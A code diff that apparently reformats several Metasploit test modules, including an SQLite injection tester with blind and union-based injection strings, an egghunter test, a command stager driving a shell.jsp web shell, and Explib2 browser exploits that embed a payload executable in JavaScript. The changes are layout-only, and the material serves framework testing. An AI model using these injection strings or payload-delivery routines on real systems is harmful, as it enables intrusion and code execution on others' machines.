], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
|
@ -8,18 +8,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
update_info(
|
update_info(
|
||||||
info,
|
info,
|
||||||
'Name' => 'SQLite injection testing module',
|
'Name' => 'SQLite injection testing module',
|
||||||
'Description' => '
|
'Description' => %q{
|
||||||
This module tests the SQL injection library against the SQLite database management system
|
This module tests the SQL injection library against the SQLite database management system
|
||||||
The target : https://github.com/incredibleindishell/sqlite-lab
|
The target : https://github.com/incredibleindishell/sqlite-lab
|
||||||
',
|
},
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
],
|
||||||
],
|
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => %w[linux],
|
'Platform' => %w[linux],
|
||||||
'References' =>
|
'References' => [],
|
||||||
[],
|
|
||||||
'Targets' => [['Wildcard Target', {}]],
|
'Targets' => [['Wildcard Target', {}]],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
)
|
)
|
||||||
|
@ -41,18 +39,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
def boolean_blind
|
def boolean_blind
|
||||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: {
|
sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: {
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
safe: datastore['Safe']
|
safe: datastore['Safe']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'tag' => "' or #{payload}--",
|
'tag' => "' or #{payload}--",
|
||||||
'search' => 'Check Plan'
|
'search' => 'Check Plan'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
res.body.include?('Dear')
|
res.body.include?('Dear')
|
||||||
end
|
end
|
||||||
unless sqli.test_vulnerable
|
unless sqli.test_vulnerable
|
||||||
|
@ -66,18 +64,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
||||||
sqli = create_sqli(dbms: SQLitei::Common, opts: {
|
sqli = create_sqli(dbms: SQLitei::Common, opts: {
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
truncation_length: truncation,
|
truncation_length: truncation,
|
||||||
safe: datastore['Safe']
|
safe: datastore['Safe']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--"
|
'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--"
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
if !res
|
if !res
|
||||||
''
|
''
|
||||||
else
|
else
|
||||||
|
@ -100,18 +98,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
def time_blind
|
def time_blind
|
||||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: {
|
sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: {
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
safe: datastore['Safe']
|
safe: datastore['Safe']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'tag' => "' or #{payload}--",
|
'tag' => "' or #{payload}--",
|
||||||
'search' => 'Check Plan'
|
'search' => 'Check Plan'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
raise ArgumentError unless res
|
raise ArgumentError unless res
|
||||||
end
|
end
|
||||||
unless sqli.test_vulnerable
|
unless sqli.test_vulnerable
|
||||||
|
@ -141,9 +139,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def check
|
def check
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'GET'
|
'method' => 'GET'
|
||||||
})
|
})
|
||||||
if res&.body&.include?('--==[[IndiShell Lab]]==--')
|
if res&.body&.include?('--==[[IndiShell Lab]]==--')
|
||||||
Exploit::CheckCode::Vulnerable
|
Exploit::CheckCode::Vulnerable
|
||||||
else
|
else
|
||||||
|
|
|
@ -3,29 +3,27 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Internal Aggressive Test Exploit',
|
update_info(
|
||||||
'Description' =>
|
info,
|
||||||
"This module tests the exploitation of a test service.",
|
'Name' => 'Internal Aggressive Test Exploit',
|
||||||
'Author' => 'skape',
|
'Description' => "This module tests the exploitation of a test service.",
|
||||||
'License' => MSF_LICENSE,
|
'Author' => 'skape',
|
||||||
'Arch' => 'x86',
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Arch' => 'x86',
|
||||||
{
|
'Payload' => {
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'MaxNops' => 0,
|
'MaxNops' => 0,
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
# Target 0: Universal
|
# Target 0: Universal
|
||||||
[
|
[
|
||||||
'Any Platform',
|
'Any Platform',
|
||||||
|
@ -37,13 +35,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Test encoder specific',
|
'Test encoder specific',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||||
'EncoderOptions' =>
|
'EncoderOptions' =>
|
||||||
{
|
{
|
||||||
'BufferRegister' => 'EBX',
|
'BufferRegister' => 'EBX',
|
||||||
'BufferOffset' => 4
|
'BufferOffset' => 4
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
|
@ -52,32 +50,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Cannot be encoded',
|
'Cannot be encoded',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[ 'Test context encoder',
|
[
|
||||||
|
'Test context encoder',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00"
|
'BadChars' => "\x00"
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
||||||
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
# Show disassembled payload for context encoder test
|
# Show disassembled payload for context encoder test
|
||||||
if target.name =~ /context encoder/
|
if target.name =~ /context encoder/
|
||||||
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0, 40])
|
||||||
end
|
end
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
|
@ -3,78 +3,77 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
Here's an example of building an exploit using the BrowserExploitServer.
|
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
|
||||||
This example requires the target to be exploit. If not, the mixin will
|
'Description' => %q{
|
||||||
send a fake 404 as a way to avoid engaging the target. The example is
|
Here's an example of building an exploit using the BrowserExploitServer.
|
||||||
for Windows only.
|
This example requires the target to be exploit. If not, the mixin will
|
||||||
},
|
send a fake 404 as a way to avoid engaging the target. The example is
|
||||||
'License' => MSF_LICENSE,
|
for Windows only.
|
||||||
'Author' => [ 'sinn3r' ],
|
},
|
||||||
'References' =>
|
'License' => MSF_LICENSE,
|
||||||
[
|
'Author' => [ 'sinn3r' ],
|
||||||
|
'References' => [
|
||||||
[ 'URL', 'https://metasploit.com' ]
|
[ 'URL', 'https://metasploit.com' ]
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' => {
|
||||||
{
|
|
||||||
:source => /script|headers/i,
|
:source => /script|headers/i,
|
||||||
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
|
# :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
|
||||||
#:method => "LoadMovie",
|
# :method => "LoadMovie",
|
||||||
:os_name => /win/i
|
:os_name => /win/i
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
[ 'Automatic', {} ],
|
[ 'Automatic', {} ],
|
||||||
[
|
[
|
||||||
'Windows XP with IE 8',
|
'Windows XP with IE 8',
|
||||||
{
|
{
|
||||||
'os_flavor' => 'XP',
|
'os_flavor' => 'XP',
|
||||||
'ua_name' => 'MSIE',
|
'ua_name' => 'MSIE',
|
||||||
'ua_ver' => '8.0',
|
'ua_ver' => '8.0',
|
||||||
'Rop' => true,
|
'Rop' => true,
|
||||||
'Offset' => 0x100
|
'Offset' => 0x100
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 7 with IE 9',
|
'Windows 7 with IE 9',
|
||||||
{
|
{
|
||||||
'os_flavor' => '7',
|
'os_flavor' => '7',
|
||||||
'ua_name' => 'MSIE',
|
'ua_name' => 'MSIE',
|
||||||
'ua_ver' => '9.0',
|
'ua_ver' => '9.0',
|
||||||
'Rop' => true,
|
'Rop' => true,
|
||||||
'Offset' => 0x100
|
'Offset' => 0x100
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 7 with IE 10',
|
'Windows 7 with IE 10',
|
||||||
{
|
{
|
||||||
'os_flavor' => '7',
|
'os_flavor' => '7',
|
||||||
'ua_name' => 'MSIE',
|
'ua_name' => 'MSIE',
|
||||||
'ua_ver' => '10.0',
|
'ua_ver' => '10.0',
|
||||||
'Rop' => true,
|
'Rop' => true,
|
||||||
'Offset' => 0x100
|
'Offset' => 0x100
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
|
|
||||||
'Payload' =>
|
'Payload' => {
|
||||||
{
|
'BadChars' => "\x00", # Our spray doesn't like null bytes
|
||||||
'BadChars' => "\x00", #Our spray doesn't like null bytes
|
|
||||||
'StackAdjustment' => -3500
|
'StackAdjustment' => -3500
|
||||||
},
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => '2013-04-01',
|
'DisclosureDate' => '2013-04-01',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
|
@ -3,31 +3,32 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit
|
class MetasploitModule < Msf::Exploit
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Check Test Exploit",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
|
'Name' => "Check Test Exploit",
|
||||||
|
'Description' => %q{
|
||||||
This module ensures that 'check' actually functions for Exploit modules.
|
This module ensures that 'check' actually functions for Exploit modules.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'OSVDB', '0' ]
|
[ 'OSVDB', '0' ]
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
|
||||||
'todb'
|
'todb'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'DisclosureDate' => '2013-05-23'
|
'DisclosureDate' => '2013-05-23'
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
|
@ -3,7 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
|
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
|
||||||
|
@ -12,47 +11,48 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::CmdStager
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Command Stager Web Test',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
|
'Name' => 'Command Stager Web Test',
|
||||||
|
'Description' => %q{
|
||||||
This module tests the command stager mixin against a shell.jsp application installed
|
This module tests the command stager mixin against a shell.jsp application installed
|
||||||
on an Apache Tomcat server.
|
on an Apache Tomcat server.
|
||||||
},
|
},
|
||||||
'Author' => 'bannedit',
|
'Author' => 'bannedit',
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' => {
|
||||||
{
|
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' => {
|
||||||
{
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
# need more but this will likely cover most cases
|
# need more but this will likely cover most cases
|
||||||
[ 'Automatic Targeting',
|
[
|
||||||
|
'Automatic Targeting',
|
||||||
{
|
{
|
||||||
'auto' => true
|
'auto' => true
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DisclosureDate' => '2010-02-03'))
|
'DisclosureDate' => '2010-02-03'
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# This is method required for the CmdStager to work...
|
# This is method required for the CmdStager to work...
|
||||||
def execute_command(cmd, opts)
|
def execute_command(cmd, opts)
|
||||||
uri = opts[:uri]
|
uri = opts[:uri]
|
||||||
|
@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
opts = {
|
opts = {
|
||||||
:delay => 0.5,
|
:delay => 0.5,
|
||||||
:uri => "/shell/shell.jsp?cmd=CMDS"
|
:uri => "/shell/shell.jsp?cmd=CMDS"
|
||||||
|
@ -72,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
execute_cmdstager(opts)
|
execute_cmdstager(opts)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,37 +3,37 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Dialup
|
include Msf::Exploit::Remote::Dialup
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Test Dialup Exploit',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This exploit connects to a system's modem over dialup and provides
|
'Name' => 'Test Dialup Exploit',
|
||||||
the user with a readout of the login banner.
|
'Description' => %q{
|
||||||
},
|
This exploit connects to a system's modem over dialup and provides
|
||||||
'Author' =>
|
the user with a readout of the login banner.
|
||||||
[
|
},
|
||||||
|
'Author' => [
|
||||||
'I)ruid',
|
'I)ruid',
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_TTY,
|
'Arch' => ARCH_TTY,
|
||||||
'Platform' => ['unix'],
|
'Platform' => ['unix'],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Payload' => {
|
||||||
{
|
'Space' => 1000,
|
||||||
'Space' => 1000,
|
|
||||||
'BadChars' => '',
|
'BadChars' => '',
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[ 'Automatic', {} ],
|
||||||
[ 'Automatic', { } ],
|
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
|
|
|
@ -3,7 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
|
@ -11,43 +10,46 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Egghunter
|
include Msf::Exploit::Egghunter
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Internal Egghunter Test Exploit',
|
update_info(
|
||||||
'Description' =>
|
info,
|
||||||
"This module tests the exploitation of a test service using the Egghunter.",
|
'Name' => 'Internal Egghunter Test Exploit',
|
||||||
'Author' => 'jduck',
|
'Description' => "This module tests the exploitation of a test service using the Egghunter.",
|
||||||
'License' => MSF_LICENSE,
|
'Author' => 'jduck',
|
||||||
'Arch' => ARCH_X86,
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Arch' => ARCH_X86,
|
||||||
{
|
'Payload' => {
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'MaxNops' => 0,
|
'MaxNops' => 0,
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[
|
||||||
[ 'Windows',
|
'Windows',
|
||||||
{
|
{
|
||||||
'Platform' => 'win'
|
'Platform' => 'win'
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
|
||||||
[ 'Linux',
|
[
|
||||||
|
'Linux',
|
||||||
{
|
{
|
||||||
'Platform' => 'linux'
|
'Platform' => 'linux'
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
|
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
@ -57,20 +59,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
||||||
print_status("Sending #{payload.encoded.length} byte payload...")
|
print_status("Sending #{payload.encoded.length} byte payload...")
|
||||||
|
|
||||||
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
|
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
|
||||||
:checksum => true
|
:checksum => true
|
||||||
})
|
})
|
||||||
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
|
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
|
||||||
|
|
||||||
sploit = ''
|
sploit = ''
|
||||||
|
|
||||||
# break before?
|
# break before?
|
||||||
#sploit << "\xcc"
|
# sploit << "\xcc"
|
||||||
sploit << eh_stub
|
sploit << eh_stub
|
||||||
# just return otherwise
|
# just return otherwise
|
||||||
sploit << "\xc3"
|
sploit << "\xc3"
|
||||||
|
|
|
@ -3,47 +3,45 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Explib2 Drop Exec Test Case",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module allows to test integration of Explib2 into metasploit.
|
'Name' => "Explib2 Drop Exec Test Case",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
This module allows to test integration of Explib2 into metasploit.
|
||||||
'Author' =>
|
},
|
||||||
[
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
'guhe120', # Original explib2 author
|
'guhe120', # Original explib2 author
|
||||||
'juan vazquez'
|
'juan vazquez'
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' => {
|
||||||
{
|
:source => /script/i,
|
||||||
:source => /script/i,
|
|
||||||
:os_name => OperatingSystems::WINDOWS,
|
:os_name => OperatingSystems::WINDOWS,
|
||||||
:ua_name => HttpClients::IE,
|
:ua_name => HttpClients::IE,
|
||||||
:ua_ver => '11.0'
|
:ua_ver => '11.0'
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[ 'Automatic', {} ]
|
||||||
[ 'Automatic', { } ]
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2014-03-28',
|
'DisclosureDate' => '2014-03-28',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_html
|
def exploit_html
|
||||||
|
|
||||||
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
|
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
|
||||||
|
|
||||||
template = %Q|<html>
|
template = %Q|<html>
|
||||||
|
|
|
@ -3,42 +3,41 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Explib2 Exec Test Case",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module allows to test integration of Explib2 into metasploit.
|
'Name' => "Explib2 Exec Test Case",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
This module allows to test integration of Explib2 into metasploit.
|
||||||
'Author' =>
|
},
|
||||||
[
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
'guhe120', # Original explib2 author
|
'guhe120', # Original explib2 author
|
||||||
'juan vazquez'
|
'juan vazquez'
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
||||||
],
|
